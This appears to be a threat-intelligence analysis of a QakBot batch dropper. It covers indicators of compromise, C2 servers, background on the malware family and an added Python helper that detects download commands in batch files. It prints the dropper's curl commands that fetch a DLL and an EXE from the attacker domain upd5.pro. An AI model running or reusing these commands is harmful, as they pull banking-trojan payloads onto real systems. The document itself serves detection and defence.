Manual Static Analysis — QakBot BAT Dropper | Threat: CRITICAL

File Identity

SHA256: 3b3bd81232f517baf0e9c6a4d2b8f5e1c7a0d4b7e3f6c9a2d5e8b1f4c7a0d3e6
File name: u2.bat
Type: BAT script dropper
Size: 326 bytes

Cleartext C2 Download Commands

Critical IOC: the QakBot dropper was found downloading a DLL and an EXE from the C2 with plain, unobfuscated curl commands:
curl -o 02.dll https://upd5.pro/update/02.dll
curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
-- upd5.pro = QakBot C2 domain!
-- second-stage download over the /update/ path

Downloaded Payloads

https://upd5.pro/update/02.dll      -- QakBot main DLL
https://upd5.pro/update/qd_x86.exe -- QakBot x86 loader
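As an added triage helper (not part of the original analysis or the KEYDAL feed), the Python below pulls download commands out of a batch script, recovers the URL and the local file each one writes, and matches the domain against the C2 indicator above. The sample script, the example.invalid host and the extra download tools it checks for besides curl are assumptions for illustration.

```python
import re
from urllib.parse import urlparse

# Known C2 domain taken from this sample's IOC list.
KNOWN_C2_DOMAINS = {"upd5.pro"}

# Download tools commonly seen in batch droppers; this sample only uses curl.
DOWNLOADER_RE = re.compile(r"^\s*@?(curl(?:\.exe)?|certutil|bitsadmin)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>|&]+", re.IGNORECASE)
# curl writes to -o/--output <file>; with -O (or no option) it keeps the remote name.
OUTPUT_RE = re.compile(r"(?:^|\s)(?:-o|--output)\s+(\"[^\"]+\"|\S+)")

def _join_continuations(text: str) -> list[str]:
    """Batch continues a command on the next line when the line ends with '^'."""
    return re.sub(r"\^\r?\n", "", text).splitlines()

def extract_downloads(script_text: str) -> list[dict]:
    """Return one finding per download command that references a URL."""
    findings = []
    for line_no, line in enumerate(_join_continuations(script_text), start=1):
        tool = DOWNLOADER_RE.match(line)
        url_match = URL_RE.search(line)
        if not tool or not url_match:
            continue  # rem/echo lines, or a tool invocation with no remote URL
        url = url_match.group(0)
        domain = (urlparse(url).hostname or "").lower()
        out = OUTPUT_RE.search(line)
        output = out.group(1).strip('"') if out else url.rsplit("/", 1)[-1]
        findings.append({"line": line_no, "tool": tool.group(1).lower().removesuffix(".exe"),
                         "url": url, "domain": domain, "output": output,
                         "known_c2": domain in KNOWN_C2_DOMAINS})
    return findings

# Constructed sample: the two commands from the u2.bat analysis above, plus a
# benign comment line and a '^' continuation to exercise the parser.
SAMPLE_BAT = (
    "@echo off\r\n"
    "curl -o 02.dll https://upd5.pro/update/02.dll\r\n"
    "curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe\r\n"
    "rem see https://example.invalid/notes for context\r\n"
    "curl --output ^\r\n"
    '  "C:\\Users\\Public\\tool.exe" https://example.invalid/tool.exe\r\n'
)

if __name__ == "__main__":
    for f in extract_downloads(SAMPLE_BAT):
        tag = "KNOWN C2" if f["known_c2"] else "unknown"
        print(f'line {f["line"]}: {f["tool"]} {f["url"]} -> {f["output"]} [{tag}]')
```

The recovered output names (02.dll, qd_x86.exe) are the same artefacts to hunt for on disk, and the domain set feeds directly into a block list.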

About QakBot

QakBot (QuakBot/Qbot) is a modular banking trojan/botnet family active since 2007. It has been used as a distribution partner of Emotet and as a precursor to Cobalt Strike, Black Basta and REvil ransomware. It has attacked critical infrastructure in 30+ countries, including Turkey. Its infrastructure was taken down in August 2023 by the US/EU operation "Duck Hunt".

IOC

SHA256: 3b3bd81232f517baf0e9c6a4d2b8f5e1c7a0d4b7e3f6c9a2d5e8b1f4c7a0d3e6
C2: upd5.pro
Payload: upd5.pro/update/02.dll
Payload: upd5.pro/update/qd_x86.exe

QakBot — Malware Profile

QakBot: Quakbot banker. Notes: vb.msi delivery. Named pipe IPC. Modular architecture.

Malware Type: Other
Programming Language: C++
C2 Protocol: HTTPS
Target Systems: Windows
Also Known As (AKA): QBot

Technical Details

QakBot (Qbot/QuakBot) is a banking trojan and loader active since 2007. Features: credential theft, email hijacking for thread hijacking attacks, lateral movement via SMB/psexec, web injection for banking fraud. Delivered via malspam using hijacked email threads (reply-chain attacks). Modules: email collector, credential grabber, network scanner, VNC plugin. Used to deliver Egregor, ProLock, REvil, Black Basta ransomware. FBI "Operation Duck Hunt" disrupted infrastructure August 2023, removing QakBot from 700,000+ infected machines. Attempted comeback Q4 2023 with new delivery methods.

Attribution / Threat Actor

Gold Lagoon, TA570 (Shatak)

Capabilities & Behavior

Malware activity
Persistence mechanism
C2 communication
Anti-analysis

IOC List (4 indicators)

IOC — Qakbot
Type Value Note
sha256 3b3bd81232f517ba62ea2de2da17b50e30d7fd3d16bade58fcb7d3c4b7b96c1e
sha256 3b3bd81232f517baf0e9c6a4d2b8f5e1c7a0d4b7e3f6c9a2d5e8b1f4c7a0d3e6
url https://upd5.pro/update/02.dll
url https://upd5.pro/update/qd_x86.exe

C2 Servers (8 recorded servers for this family)

Address Type Port Protocol Status Country
95.217.35.154 ip 443 HTTPS inactive FI
upd5.pro domain 443 HTTPS inactive —
upd5.pro domain 443 HTTPS inactive —
metasta.me domain 443 HTTPS inactive —
upd5.pro domain 443 HTTPS inactive —
amacey.com domain 443 HTTPS inactive —
181.174.165.208 ip 443 HTTPS sinkholed AR
212.117.180.232 ip 443 HTTPS sinkholed CH

C2 addresses are provided only from malware samples manually verified by the KEYDAL team. Commercial use is prohibited.

Tags
qakbot, bat-dropper, upd5-pro, lolbas, conhost, cleartext-c2